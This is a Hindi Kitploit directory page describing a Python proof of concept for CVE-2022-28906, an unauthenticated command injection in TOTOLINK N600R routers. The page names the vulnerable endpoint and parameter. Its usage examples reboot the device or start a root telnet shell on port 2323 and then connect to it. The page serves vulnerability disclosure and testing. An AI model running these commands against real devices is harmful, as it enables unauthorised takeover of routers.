Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/finnvle/cve-2022-28906-poc
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलहार्डवेयर और IoT सुरक्षा
GitHubfinnvle/cve-2022-28906-poc

CVE-2022-28906-POC

पायथन प्रूफ-ऑफ-कॉन्सेप्ट TOTOLINK N600R में बिना प्रमाणीकरण के OS कमांड इंजेक्शन के लिए, जो langType पैरामीटर का शोषण करके डिवाइस पर मनमाने कमांड निष्पादित करता है।

रिपॉजिटरी देखें
1211 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-28906 PoC

TOTOLINK N600R में बिना प्रमाणीकरण के कमांड इंजेक्शन के लिए Python प्रूफ ऑफ कॉन्सेप्ट।

Python CVSS

भेद्यता

उत्पाद TOTOLINK N600R
फर्मवेयर V5.3c.7159_B20190425
प्रकार OS कमांड इंजेक्शन (CWE-78)
पैरामीटर langType
एंडपॉइंट /cgi-bin/cstecgi.cgi
CVSS v3.1 9.8 क्रिटिकल

TOTOLink N600R V5.3c.7159_B20190425 में /setting/setLanguageCfg में langtype पैरामीटर के माध्यम से कमांड इंजेक्शन भेद्यता पाई गई।

सेटअप

python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

उपयोग

# उपयोग: python3 poc.py <TARGET> <COMMAND>
# उदाहरण: python3 poc.py 192.168.68.1 "reboot"
# उदाहरण: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

python3 poc.py <TARGET> <COMMAND>

प्रूफ ऑफ कॉन्सेप्ट उदाहरण

PoC का उपयोग करके लक्ष्य पर पोर्ट 2323 पर /bin/sh सेवा सक्षम करने के लिए रिमोट निष्पादन करें

python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

सफल PoC प्रतिक्रिया

पोर्ट 2323 सक्षम होने पर परिणाम देखें

Nmap पोर्ट 2323 खुला दिखा रहा है

पोर्ट 2323 के माध्यम से telnet का उपयोग करके लक्ष्य से कनेक्ट करें

telnet 192.168.68.1 2323

रूट शेल सत्यापन

संदर्भ

  • NVD — CVE-2022-28906
  • CVE रिकॉर्ड — CVE-2022-28906
  • CWE-78 — OS कमांड इंजेक्शन

अस्वीकरण

बिना किसी वारंटी के जैसा है वैसा प्रदान किया गया। लेखक दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें